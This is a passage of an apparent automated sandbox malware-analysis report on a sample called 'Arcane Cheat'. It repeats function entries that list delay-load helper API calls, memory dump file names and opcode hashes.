                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083D8A3
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: a83b67bae8b0da00bfbf383f6e7e9b178291f6e1e91cdcea7747ab756e323b49
                                  • Instruction ID: 2b5b888750ba74f4db0a7fc0a5637f9bd94d509a6b0284c44d6bfa7cb94912c2
                                  • Opcode Fuzzy Hash: a83b67bae8b0da00bfbf383f6e7e9b178291f6e1e91cdcea7747ab756e323b49
                                  • Instruction Fuzzy Hash: 0DA012D116C2027C300822047C42C36021CE4C0B517304819B406D00C098402C080471
                                  Function 0083D93D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083D8A3
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 47377278aef5336c59bfa215bfb5d054331ae6405488c3b4450b095935fecc9a
                                  • Instruction ID: 2b5b888750ba74f4db0a7fc0a5637f9bd94d509a6b0284c44d6bfa7cb94912c2
                                  • Opcode Fuzzy Hash: 47377278aef5336c59bfa215bfb5d054331ae6405488c3b4450b095935fecc9a
                                  • Instruction Fuzzy Hash: 0DA012D116C2027C300822047C42C36021CE4C0B517304819B406D00C098402C080471
                                  Function 0083D951 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083D8A3
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 2c1b26904271627acb2f46064440e3dbbf89d8996a86c72b8c35a2d770c26f55
                                  • Instruction ID: 2b5b888750ba74f4db0a7fc0a5637f9bd94d509a6b0284c44d6bfa7cb94912c2
                                  • Opcode Fuzzy Hash: 2c1b26904271627acb2f46064440e3dbbf89d8996a86c72b8c35a2d770c26f55
                                  • Instruction Fuzzy Hash: 0DA012D116C2027C300822047C42C36021CE4C0B517304819B406D00C098402C080471
                                  Function 0083D95B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083D8A3
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 035c9683b23b417bc94ab1a52fa2470f14a00d1c342345fd932a814b57caf389
                                  • Instruction ID: 2b5b888750ba74f4db0a7fc0a5637f9bd94d509a6b0284c44d6bfa7cb94912c2
                                  • Opcode Fuzzy Hash: 035c9683b23b417bc94ab1a52fa2470f14a00d1c342345fd932a814b57caf389
                                  • Instruction Fuzzy Hash: 0DA012D116C2027C300822047C42C36021CE4C0B517304819B406D00C098402C080471
                                  Function 0083D965 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083D8A3
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 7beedaad7cd969b04404e8c8aab76d76ee3f464b28cda37966c70ceca5da02bf
                                  • Instruction ID: 2b5b888750ba74f4db0a7fc0a5637f9bd94d509a6b0284c44d6bfa7cb94912c2
                                  • Opcode Fuzzy Hash: 7beedaad7cd969b04404e8c8aab76d76ee3f464b28cda37966c70ceca5da02bf
                                  • Instruction Fuzzy Hash: 0DA012D116C2027C300822047C42C36021CE4C0B517304819B406D00C098402C080471
                                  Function 0083D96F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083D8A3
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: b85bb22d50cd3a840ffb19fcf2d04ca2d9c9c4cda89c6cf754b4a1f97ae3f5d9
                                  • Instruction ID: 2b5b888750ba74f4db0a7fc0a5637f9bd94d509a6b0284c44d6bfa7cb94912c2
                                  • Opcode Fuzzy Hash: b85bb22d50cd3a840ffb19fcf2d04ca2d9c9c4cda89c6cf754b4a1f97ae3f5d9
                                  • Instruction Fuzzy Hash: 0DA012D116C2027C300822047C42C36021CE4C0B517304819B406D00C098402C080471
                                  Function 0083D979 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083D8A3
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: e406242a83dd6018deb13186c78c2b7440feee50f4ddc09d4b9317fb3a615679
                                  • Instruction ID: 2b5b888750ba74f4db0a7fc0a5637f9bd94d509a6b0284c44d6bfa7cb94912c2
                                  • Opcode Fuzzy Hash: e406242a83dd6018deb13186c78c2b7440feee50f4ddc09d4b9317fb3a615679
                                  • Instruction Fuzzy Hash: 0DA012D116C2027C300822047C42C36021CE4C0B517304819B406D00C098402C080471
                                  Function 0083DAA5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083DAB2
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 9ae261a39cdd678c2a8aaa195d0115c9c8eba6e905414416fac25f47fa6283e4
                                  • Instruction ID: 8ab3cb70a661eca2d7fd7b2c73772237399cb8bc5a97ee4718b1218b9f570997
                                  • Opcode Fuzzy Hash: 9ae261a39cdd678c2a8aaa195d0115c9c8eba6e905414416fac25f47fa6283e4
                                  • Instruction Fuzzy Hash: F0A011E22AC2023C3008B202BE02C3A032CF0E0B22B30820AF80AE0088A888080808B2
                                  Function 0083DAC0 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083DAB2
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 8f3037c2d1ef6c01d76bb3016bbf249d763ab95d105606b15736f6630fd7cb83
                                  • Instruction ID: 717cbb36d351c1d0d5ac4024731f28dbb97760679df84ae775c376abcfc6bf97
                                  • Opcode Fuzzy Hash: 8f3037c2d1ef6c01d76bb3016bbf249d763ab95d105606b15736f6630fd7cb83
                                  • Instruction Fuzzy Hash: D5A011E22AC202BC30083202BE02C3A032CF0C0BA2B308A0AF80AC0088A888080808B2
                                  Function 0083DACA Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083DAB2
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 5c42efba3c6fb267f739028c939c86411cde48f41b6bffa4c187f3af6862aaa5
                                  • Instruction ID: 717cbb36d351c1d0d5ac4024731f28dbb97760679df84ae775c376abcfc6bf97
                                  • Opcode Fuzzy Hash: 5c42efba3c6fb267f739028c939c86411cde48f41b6bffa4c187f3af6862aaa5
                                  • Instruction Fuzzy Hash: D5A011E22AC202BC30083202BE02C3A032CF0C0BA2B308A0AF80AC0088A888080808B2
                                  Function 0083DAE8 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083DAB2
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 4acdcd42264e9436023ab76613e055fff9d7304f3af9a8962b990d3bd14b68a5
                                  • Instruction ID: 717cbb36d351c1d0d5ac4024731f28dbb97760679df84ae775c376abcfc6bf97
                                  • Opcode Fuzzy Hash: 4acdcd42264e9436023ab76613e055fff9d7304f3af9a8962b990d3bd14b68a5
                                  • Instruction Fuzzy Hash: D5A011E22AC202BC30083202BE02C3A032CF0C0BA2B308A0AF80AC0088A888080808B2
                                  Function 0083DAF2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083DAB2
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 065504917ae3c8f745d08d88d19e845497b9d03787543c1d11383e5c740bb531
                                  • Instruction ID: 717cbb36d351c1d0d5ac4024731f28dbb97760679df84ae775c376abcfc6bf97
                                  • Opcode Fuzzy Hash: 065504917ae3c8f745d08d88d19e845497b9d03787543c1d11383e5c740bb531
                                  • Instruction Fuzzy Hash: D5A011E22AC202BC30083202BE02C3A032CF0C0BA2B308A0AF80AC0088A888080808B2
                                  Function 0083DAFC Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083DAB2
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: d7d161622d38dfae236d4e6caa7ca679f6d26b1643a97a79cf9c24415343f855
                                  • Instruction ID: 717cbb36d351c1d0d5ac4024731f28dbb97760679df84ae775c376abcfc6bf97
                                  • Opcode Fuzzy Hash: d7d161622d38dfae236d4e6caa7ca679f6d26b1643a97a79cf9c24415343f855
                                  • Instruction Fuzzy Hash: D5A011E22AC202BC30083202BE02C3A032CF0C0BA2B308A0AF80AC0088A888080808B2
                                  Function 0083DBF7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083DBD5
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: b7d173e5a33f8eaa6e7c8266a146388802c0ad82016fe099cb68154f221fd9a5
                                  • Instruction ID: 83780b0a61977c73541c5e3ac597b336e51557a4b242dbf28fcfd18876e2b4c9
                                  • Opcode Fuzzy Hash: b7d173e5a33f8eaa6e7c8266a146388802c0ad82016fe099cb68154f221fd9a5
                                  • Instruction Fuzzy Hash: DFA011EA2AC20ABC300822003C0BC3A022CF0C0BB2B30880AB80AC0080AE800C0A00B2
                                  Function 0083DC0B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083DBD5
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                  • String ID:
                                  • API String ID: 1269201914-0
                                  • Opcode ID: 4d56c7833b02eca171b03393279ad87a2662cd94d10f2b36652078b1be487eed
                                  • Instruction ID: 83780b0a61977c73541c5e3ac597b336e51557a4b242dbf28fcfd18876e2b4c9
                                  • Opcode Fuzzy Hash: 4d56c7833b02eca171b03393279ad87a2662cd94d10f2b36652078b1be487eed
                                  • Instruction Fuzzy Hash: DFA011EA2AC20ABC300822003C0BC3A022CF0C0BB2B30880AB80AC0080AE800C0A00B2
                                  Function 0083DC15 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0083DBD5
                                    • Part of subcall function 0083DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0083DFD6
                                    • Part of subcall function 0083DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0083DFE7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
